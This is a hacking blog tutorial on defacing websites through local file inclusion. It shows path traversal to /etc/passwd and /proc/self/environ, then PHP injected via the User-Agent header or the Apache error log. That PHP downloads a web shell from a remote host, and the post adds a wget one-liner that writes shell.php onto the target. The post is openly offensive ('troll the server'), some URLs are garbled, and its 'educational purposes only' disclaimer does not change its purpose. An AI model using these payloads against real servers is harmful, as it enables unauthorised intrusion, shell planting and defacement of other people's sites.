Latest News

LFI- Defacing

[MethoD 1]

NOTE: You will need FireFox and its addon Tamper Data to do this method!

LFI or Local File Inclusion allows you to include a local file(which means, that the file is stored on the server) and run it in a webscript.
In this method we are going to upload a shell by accessing the proc/self/environ.

Now we have our page

http://www.target.com/index.php?include=register.php

And now we are going to do this:

http://www.target.com/index.php?include=../


If it gives you an error message, this is good. Best thing that can happen is, it says "No such file or directory". But anyways, now add this to your url:

http://www.target.com/index.php?include=../etc/passwd


And as long as there is no text other than an error message on the page, keep adding "../" to the URL, so it would be like:

http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd
http://www.target.com/index.php?include=.../passwd


And so on. Now let's say we got to this URL

http://www.target.com/index.php?include=.../passwd
And we see some huge shitty text we can not handle with. Now change the etc/passwd in the URL to proc/self/environ so it would look like this:

http://www.target.com/index.php?include=...environ


If you see some text, you did good, if you see an error message you did bad. Now this is the point where we use Tamper Data. Start you Tamper and reload the page, and for user agent you type in the following PHP script:

Code: 
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>


This will execute the PHP script on the site and create a shell.php on the server. Why? Because the user agent is being displayed on the webpage, and if you put in a webscript for that, it will execute it.

Now simply access your shell by going to

http://www.taget.com/shell.php


And troll the server.

[Now LFI method 2]

NOTE: This only works on apache servers!

Alright you get back to the point where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd, you will try to get access to apache/logs/error.log

If you have a brain, you should know how to do that, since it's EXACTLY the same method as on etc/passwd (explained in LFI method 1).

Now when you have found the file, open up cmd and type in

telnet http://www.tagrget.com 80

When you are inside the telnet, you copy the following code(you use your own shell url ofc)

Code: 
<?php $file = fopen("shell.php","w+"); $stream = fopen ("http://www.website.com/yourshell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>



Paste it into the telnet window, and press enter once or maybe twice(until you get an error message).

Now refresh the page in the browser(error.log) once and there you go. The PHP script will be executed and your shell will get uploaded to the server. Access it by typing in the following into your browser:

http://www.taget.com/shell.php

Author: AHFCREW blog
Video tut for the Tamper Data method!

http://www.youtube.com/watch?v=-YRdqD8199s

Agent's script used in the video:
Code: 
<?system('wget http://www.website.com/yourshell.txt -o shell.php');>


No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code